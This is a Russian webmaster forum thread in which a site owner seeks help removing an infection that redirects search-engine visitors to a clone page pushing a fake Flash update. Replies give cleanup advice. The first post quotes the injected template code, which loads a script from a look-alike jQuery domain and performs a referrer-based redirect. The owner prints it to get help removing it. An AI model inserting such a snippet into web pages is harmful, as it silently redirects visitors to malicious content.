X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

> Помогите убрать вирус с сайта
Miha
Miha
Topic Starter сообщение 7.1.2013, 14:33; Ответить: Miha
Сообщение #1


Есть сайтик - shkola-fan.ru
Уже два года капает денежка в сапе. Периодически даже есть заявки на гогетлинксе. Поэтому терять жалко.

Проблема в следующем.
Когда переходишь на сайт напрямую вбивая адрес - все нормально.
Если же переходишь с поисковиков, то попадаешь на какую-то хрень -
http://shkola-fan.ru.locz.ru/?

При этом на фоне клона - копия моего сайта. А по центру всплывающий банер с предложением обновить флешплеер. Не знаю, на что рассчитывают, т.к. трафика на сайте нет вообще.

Обвновлял версию движка до последней. Помогло на время, потом опять. Сайт на хостинге один.

Что делать?

По отличии в дате изменения увидел, что в main.tpl добавили вот это:
<!--x813n--><script type="text/javascript" src='http://google-jquery.ru/jquery.js'></script> <script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n--><!--x813n--><script type="text/javascript" src='http://google-jquery.ru/jquery.js'></script>
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n--></body> </html>


Удалить это не проблема. Как сделать так, чтобы не появлялось.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
 
Открыть тему
Ответов (1 - 7)
Kuznec37
Kuznec37
сообщение 7.1.2013, 14:38; Ответить: Kuznec37
Сообщение #2


(Miha @ 7.1.2013, 11:26) *
Что делать?

1. Чистить комп, не хранить пароли в FTP-клиенте.
Смотрите файл .htaccess, 100% там перееадресацию внедрили.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nemovalex
Nemovalex
сообщение 7.1.2013, 14:38; Ответить: Nemovalex
Сообщение #3


Хостинг нормальный используете? Иногда бывает, что это из за хостинга, то есть они меняют код.
Так же проверьте сайтик айболитом.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rampage
Rampage
сообщение 7.1.2013, 14:58; Ответить: Rampage
Сообщение #4


стучи в асю попробуем решить


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 7.1.2013, 15:11; Ответить: seomasters
Сообщение #5


http://www.maultalk.com/topic140563s0.html...p;#entry1524669

Если ещё актуально!
Готов помочь в решение вашей проблемы.

Сообщение отредактировал seomasters - 7.1.2013, 15:11


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
spy3r
spy3r
сообщение 7.1.2013, 19:09; Ответить: spy3r
Сообщение #6


Тоже подцепил сегодня этот вирус.
Могу сказать, что:
1. Точно не через сломанный фтп.
2. Точно не хостинг.
Т.к. на сервере есть виртуалки пожирнее, а вирус установился в самый мелкий сайтик с 5 людьми в сутки))

95%, что это какая-то дыра в DLE.
Сейчас обновился до 9.7.
Выставил на папку templates CHMOD - 644, проверил, что средствами DLE редактировать шаблоны не даёт (выводит Нет прав на запись файла. Установите CHMOD (666) ).
На всякий случай ещё сменил пароли и переименовал админку.

Кстати, пароль у меня стоял qweqwe - т.е. возможно сбрутили.

Сообщение отредактировал spy3r - 7.1.2013, 19:11
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
neoBuT
neoBuT
сообщение 13.1.2013, 14:42; Ответить: neoBuT
Сообщение #7


Сталкивался с данной проблемой, решение простое но более забыл о спиногрызе. Стучите в аську помогу вам с решением этой проблемы. Аська 581-797-560 .

Сообщение отредактировал neoBuT - 13.1.2013, 14:55


--------------------
Просто сайт о богато
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Hind
Hind
сообщение 14.2.2013, 4:45; Ответить: Hind
Сообщение #8


neoBuT, ну и как же вы так точно определили уязвимость? Научите! А другой точно понял, что подцепил такой же вирус. Расскажите всем ваш простой метод! Уязвимостей тысячи, у ТС может стоять какое-нибудь дополнение к cms с уязвимостью. Научите также лечить и всё понимать по темам на форуме.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Продвижение молодого сайта
30 maxmer 6362 26.3.2024, 21:49
автор: c4p1t4l15t
Открытая тема (нет новых ответов) SEO-текст на главной странице сайта и в категориях
5 boltuk 1351 26.3.2024, 21:43
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Какой % отказов нормален для сайта?
10 Aloof 2541 24.3.2024, 21:45
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрая индексация страниц сайта и обратных ссылок - 2Index
32 2Index 5807 18.3.2024, 16:33
автор: 2Index
Открытая тема (нет новых ответов) Перенос сайта на CMS Wordpress
8 freeax 4843 10.3.2024, 14:58
автор: freeax


 



RSS Текстовая версия Сейчас: 28.3.2024, 15:41
Дизайн